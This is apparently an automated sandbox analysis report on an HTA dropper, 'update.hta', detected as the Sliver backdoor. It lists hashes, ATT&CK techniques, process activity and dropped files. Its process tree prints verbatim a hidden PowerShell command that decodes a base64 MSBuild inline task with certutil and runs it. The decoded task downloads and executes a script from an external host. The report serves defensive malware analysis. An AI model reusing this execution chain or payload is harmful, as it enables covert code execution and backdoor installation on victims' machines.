sliver | 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Analysis

max time kernel
119s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 08:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.hta
Size

3KB
MD5

f46e78d3864aae68f2b8e83af27b9cf3
SHA1

51d75c93a4d06327f172d41c797ecc99a8ba309a
SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
SHA512

e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3036-75-0x0000000020680000-0x00000000210FB000-memory.dmp	SliverRAT_v2
behavioral1/memory/3036-78-0x0000000022160000-0x0000000022C44000-memory.dmp	SliverRAT_v2
behavioral1/memory/3036-77-0x0000000022160000-0x0000000022C44000-memory.dmp	SliverRAT_v2
behavioral1/memory/3036-79-0x0000000022160000-0x0000000022C44000-memory.dmp	SliverRAT_v2
behavioral1/memory/3036-80-0x0000000022160000-0x0000000022C44000-memory.dmp	SliverRAT_v2
behavioral1/memory/3036-76-0x0000000022160000-0x0000000022C44000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2844	powershell.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
2916	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.execertutil.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemsbuild.exe

description	pid	Process
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	3036	msbuild.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exepowershell.exemsbuild.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 2192 wrote to memory of 2844	2192	mshta.exe	30
PID 2192 wrote to memory of 2844	2192	mshta.exe	30
PID 2192 wrote to memory of 2844	2192	mshta.exe	30
PID 2192 wrote to memory of 2844	2192	mshta.exe	30
PID 2844 wrote to memory of 2916	2844	powershell.exe	32
PID 2844 wrote to memory of 2916	2844	powershell.exe	32
PID 2844 wrote to memory of 2916	2844	powershell.exe	32
PID 2844 wrote to memory of 2916	2844	powershell.exe	32
PID 2844 wrote to memory of 3036	2844	powershell.exe	33
PID 2844 wrote to memory of 3036	2844	powershell.exe	33
PID 2844 wrote to memory of 3036	2844	powershell.exe	33
PID 2844 wrote to memory of 3036	2844	powershell.exe	33
PID 3036 wrote to memory of 3020	3036	msbuild.exe	34
PID 3036 wrote to memory of 3020	3036	msbuild.exe	34
PID 3036 wrote to memory of 3020	3036	msbuild.exe	34
PID 3020 wrote to memory of 596	3020	csc.exe	35
PID 3020 wrote to memory of 596	3020	csc.exe	35
PID 3020 wrote to memory of 596	3020	csc.exe	35
PID 3036 wrote to memory of 2612	3036	msbuild.exe	36
PID 3036 wrote to memory of 2612	3036	msbuild.exe	36
PID 3036 wrote to memory of 2612	3036	msbuild.exe	36
PID 2612 wrote to memory of 2220	2612	csc.exe	37
PID 2612 wrote to memory of 2220	2612	csc.exe	37
PID 2612 wrote to memory of 2220	2612	csc.exe	37
PID 3036 wrote to memory of 1036	3036	msbuild.exe	38
PID 3036 wrote to memory of 1036	3036	msbuild.exe	38
PID 3036 wrote to memory of 1036	3036	msbuild.exe	38
PID 1036 wrote to memory of 2480	1036	csc.exe	39
PID 1036 wrote to memory of 2480	1036	csc.exe	39
PID 1036 wrote to memory of 2480	1036	csc.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\SysWOW64\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
    3⤵
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:2916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3020
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8160.tmp" "c:\Users\Admin\AppData\Local\Temp\zqq5taop\CSCB5867AA7C1E84774AC7D35E9A182F1E.TMP"
        5⤵
        
        PID:596
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2612
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82E6.tmp" "c:\Users\Admin\AppData\Local\Temp\rwmar3kj\CSCD42C67D7874B42EFB935A3AD2D5AF740.TMP"
        5⤵
        
        PID:2220
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1036
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9379.tmp" "c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\CSC5080321A549240BB88B441DC970A18B.TMP"
        5⤵
        
        PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.dll

Filesize
4KB

MD5
080e79bbe7d6054b07aff355114a5886

SHA1
b34637025a61a91234efd1c8167c7bd6ac602e9e

SHA256
5bff50b3e2a7b782e2ac5e31484b1dbfd2b5bf75404a9f126bfff5e32d3f10fc

SHA512
93d2f0eb37ca2771ea414f7d47a961d4c9fd73ccaab2262c1ac190701288069a5677c2d17ca55be435047aa7170245da871898bc4970eb60e67aa9554af4e68e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.pdb

Filesize
7KB

MD5
243f88f3e6f1a5caf3994d914fda7e33

SHA1
1bbf22015ca12d0fac58c30980b9c70799ad1c72

SHA256
9703bff9e9ac0ae72555eb6233d96b2a1433ff7de42651218544c82b59e1e536

SHA512
772f4dba8649efb886304986c90dcc130fe0858698e03307fc3e15dfd4406482b4fa5f1beaead7207906a442c2a2e7696544974c66b24c1fdb471528c4bdc170

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8160.tmp

Filesize
1KB

MD5
fd007fb85400326c46a7b49fa38c768b

SHA1
919d56ecc9154aacd7321ae7923710bec2b883bc

SHA256
3ac58b6eb7a8c056c5061f87fca2246c4333ae4a6c8d0c66551842ad2c5f3eb8

SHA512
89bf453adbd23600b381ad066a731ee53531ac3258dca31e2bd72a23e081c60e01abf24f7383e9f95f66439f0eb9d8668e5223f50fd96f3c57a8c16f3a5845f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES82E6.tmp

Filesize
1KB

MD5
72bd236616923bf71d332fe03f1d40ea

SHA1
3c14f26383362e3ad0fa2a2932a31929435a5dcf

SHA256
399b8bcb4db41612a061749614a041418d772ad0fefb95d534117fc9d3de73e5

SHA512
b8c44919149664583e9c144553e65cd0c6bb14fe8d739769d5fa0545ea120542723bc5add60d3d26c5acce38359d48683f698442a5b1818eeba5e7c4ca4067e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9379.tmp

Filesize
1KB

MD5
76fd7713a8c3c9c2cdcfb6b25b2382e2

SHA1
be336fefbe4f065b27ace3597f4033db26534d79

SHA256
a48d124680ebb6c2712a3e21551d6c8167874c93a92a166d15fc9eaf35d1ca02

SHA512
1c5c7b0800635ae384f18a8150d8e8fdd21e2a8fb4bfc76994f07986d530c04afc815dbccee523bd13e3abc3aba6c6f3cdbe5557f8e947809bcbee5773e2b904

Download Submit
C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.dll

Filesize
4KB

MD5
2e6b5b5dc995f04a454ef8063876320c

SHA1
86712136c7a46638c44b1983d10633687cf7cc75

SHA256
4c9c065e4a3001abbd5aac79a7282184831a50f05085c6f297d95032bac7ce82

SHA512
aa5abda1eba6edccdc42f035cc3979d383401adf872061a21294f23bc04e06d681dc0a5fa2c0871e9a8a9b9d3890dc2df60a7be41ee17526b41752cf83bf6859

Download Submit
C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.pdb

Filesize
11KB

MD5
1083cd943f22be2aa9af6cfe1118b4d3

SHA1
d481cdec819112b11043d894401bd2b72d65919a

SHA256
c79c0d68e9fe5477bfd3d63784449d70c917ebc523a667b8665536460c50b50d

SHA512
d199a2e0138fd435169b6329c9a571c8b96a5ee33266dafef42e49d25c78775eb4d69ead99d3cf219bc00828f98fd2561ad9842e538127266d57cba33e082a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.dll

Filesize
4KB

MD5
11d6296450c898f18c22cae4cd48a865

SHA1
b182389b7fdebde94316fb40b5eeeaa47fc1994c

SHA256
7c17ef61af67c1bee9a2ad71ea056934e240926cfcaf26fdf151656b6228db82

SHA512
b3762230257ab46089b3703b78f9a0f2dcc057f16a30f2adaf1c860263fdb82c21ad816c1c3853b387ea837842bebd46aba315efeaf036258fa199cf603c6e3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.pdb

Filesize
11KB

MD5
8480140a79ba78d79762563815938592

SHA1
f3f392ea36ead4199725b2ae0c00c24da0902a92

SHA256
9fe6e902e7f1aa11669ab894aba17bd2a9b48438577d998d5cd940aa72c124c8

SHA512
4ef456df077eca809ac84f8bb1a9bce2f1a8cd5df8ae23cce443faf72235db9b5dffee62fc79fa4493640a1394babed7bf3e1f3db7dd02df47e426f98c7b5fc1

Download Submit
C:\windows\temp\d.xml

Filesize
2KB

MD5
6c2a8d820d8d80182aacdc125399cd71

SHA1
51ccd1e0c3247bf24da813a1f660a367f8deefc8

SHA256
104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

SHA512
c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.0.cs

Filesize
611B

MD5
9dc0e32c32d7b3cfd2f819d8c0e4c7a5

SHA1
267cb8f96e02e298033786efd8ee6d87a73418a3

SHA256
67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

SHA512
c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.cmdline

Filesize
327B

MD5
a85bd98eb3d96a05e0581717dd4eff42

SHA1
2c802c9374ab45518a61b6bc4681c7b7d79e06d3

SHA256
e623afbca12171675154c4cc8e2dbfccf7a44f583f6d69b5650ba1a48cf21c22

SHA512
45992384738b71a3761dbfae78f46f8626740a49d0246b3264dcef7c2793514be6d61ed630066994542bdf5a93d9279019c6e7329a746e491f9d679d80e34889

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\CSC5080321A549240BB88B441DC970A18B.TMP

Filesize
652B

MD5
2570c0361e73fa666b4d735c0c1424e9

SHA1
98f7438113244b528dd7dc76d60074fd4ae0b8c0

SHA256
87be4fecdb0b228ff90f79724416d52e5598609cb84e3566c50cf8db012fb78e

SHA512
8633e3383f46970f7d5765f6158c1480080c86f429c13a3cb5cc8decdbef10037181a58a78f519d16991869073738791519ac15aaec0bfcdfcfae84af4f3d5f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\CSCD42C67D7874B42EFB935A3AD2D5AF740.TMP

Filesize
652B

MD5
71c96137efea33c794dfe536108af907

SHA1
be8f216439809de4bf9bfbc778bb193d1caec714

SHA256
28216bf9c89377f2cef780bce260437baf8ef62fca76ad5bc397aff622c21f73

SHA512
2ee9edc4ef3284de0e221862d0fe73a83a30b0f15710df126b7cdf6bb9bddffde035fb73d66e6b1f3ec919820d444d9575bb343b4e0b7f57a1d8b2050d37ccb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.0.cs

Filesize
1KB

MD5
da1f4b7b1a87cc475dfa05923b6301a0

SHA1
0e2ff764c519bc8169b66437857f01e25676e343

SHA256
624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

SHA512
d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.cmdline

Filesize
782B

MD5
67fe714bc79cf7d0fc1273fde2f3c1de

SHA1
fadfc2776bc4b2c76da22fe146c6fb1d8a35beb5

SHA256
592dd2ed82d0b33afdaa3a84226deecb1569b4909a6e407c368ee9713b37052b

SHA512
ee645f9c94e921d4a12256eea641a6ceb33bcd94d23b3cb29abfa01ddfc68e9d25ac1e38c39e6e54889abded951cebb8b2b2077b1eca299cdb846e43bd8898ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\CSCB5867AA7C1E84774AC7D35E9A182F1E.TMP

Filesize
652B

MD5
2374710b880ac2161dc769313a1b7531

SHA1
dbec081ecb1f1d210bcfb732a98292b61864aade

SHA256
5a03a91eb4425e2c58aedab6b96d4721b46f7d9abdfaf360b67300db8b505f6a

SHA512
fa2965749ebbf4c55df6df098d229a71331b952bf290769fdc95a452c09ce55a82ed186b90e29b853a6f1ddf33da2a78ca67c4b44064e5015df4885771385917

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.0.cs

Filesize
1KB

MD5
4a4ff4a5e71cabe4864c862a697c1e27

SHA1
b95fb7438213c3ae9caf0e8b52bb301fefcddb56

SHA256
70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

SHA512
7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.cmdline

Filesize
660B

MD5
881b1f81ea1f01a00da830ecdfc13f78

SHA1
3fa10ca9d104c51d958e265e8c8a09d2e3307aaa

SHA256
5a0773e5a53f483d7767040536e5bbaf4dee3909ea0eecfdcb8a8af7dcf5e3e6

SHA512
4d0dd301c291bfeb8086e41501fa5d100bf6c7ea4e3439aebd1dd273eb67944b91edffe487bbaeb3451e1f17c2dd431e3f3e0d3f162f14e6a9a2a382af7210cb

Download Submit
\??\c:\windows\temp\enc3.txt

Filesize
6KB

MD5
940ed0fa0b1fc8ed6fbf279ab67af56f

SHA1
da4b7c40029542659f025ae74fa0be0fb0fa473c

SHA256
731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

SHA512
934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

Download Submit
memory/3036-55-0x00000000023D0000-0x000000000241A000-memory.dmp

Filesize
296KB

Download
memory/3036-33-0x000000001E2C0000-0x000000001E5A2000-memory.dmp

Filesize
2.9MB

Download
memory/3036-57-0x000000001D080000-0x000000001D1A2000-memory.dmp

Filesize
1.1MB

Download
memory/3036-15-0x000000001D2E0000-0x000000001D644000-memory.dmp

Filesize
3.4MB

Download
memory/3036-14-0x000000001D2E0000-0x000000001D45A000-memory.dmp

Filesize
1.5MB

Download
memory/3036-13-0x0000000002280000-0x000000000229A000-memory.dmp

Filesize
104KB

Download
memory/3036-12-0x0000000002340000-0x0000000002384000-memory.dmp

Filesize
272KB

Download
memory/3036-48-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/3036-50-0x0000000002290000-0x00000000022AC000-memory.dmp

Filesize
112KB

Download
memory/3036-51-0x0000000002340000-0x0000000002388000-memory.dmp

Filesize
288KB

Download
memory/3036-52-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/3036-53-0x000000001BD70000-0x000000001BE16000-memory.dmp

Filesize
664KB

Download
memory/3036-54-0x0000000002390000-0x00000000023C4000-memory.dmp

Filesize
208KB

Download
memory/3036-32-0x000000001D080000-0x000000001D1A2000-memory.dmp

Filesize
1.1MB

Download
memory/3036-76-0x0000000022160000-0x0000000022C44000-memory.dmp

Filesize
10.9MB

Download
memory/3036-30-0x0000000000A30000-0x0000000000A38000-memory.dmp

Filesize
32KB

Download
memory/3036-58-0x000000001D080000-0x000000001D13A000-memory.dmp

Filesize
744KB

Download
memory/3036-11-0x00000000009E0000-0x0000000000A24000-memory.dmp

Filesize
272KB

Download
memory/3036-10-0x000000001D1B0000-0x000000001D2D2000-memory.dmp

Filesize
1.1MB

Download
memory/3036-9-0x000000001D080000-0x000000001D1A2000-memory.dmp

Filesize
1.1MB

Download
memory/3036-7-0x000000001B8E0000-0x000000001BA3A000-memory.dmp

Filesize
1.4MB

Download
memory/3036-6-0x0000000000750000-0x000000000076A000-memory.dmp

Filesize
104KB

Download
memory/3036-5-0x000000013F560000-0x000000013F59E000-memory.dmp

Filesize
248KB

Download
memory/3036-73-0x00000000024C0000-0x00000000024C8000-memory.dmp

Filesize
32KB

Download
memory/3036-75-0x0000000020680000-0x00000000210FB000-memory.dmp

Filesize
10.5MB

Download
memory/3036-78-0x0000000022160000-0x0000000022C44000-memory.dmp

Filesize
10.9MB

Download
memory/3036-77-0x0000000022160000-0x0000000022C44000-memory.dmp

Filesize
10.9MB

Download
memory/3036-79-0x0000000022160000-0x0000000022C44000-memory.dmp

Filesize
10.9MB

Download
memory/3036-80-0x0000000022160000-0x0000000022C44000-memory.dmp

Filesize
10.9MB

Download
memory/3036-56-0x00000000024A0000-0x00000000024B6000-memory.dmp

Filesize
88KB

Download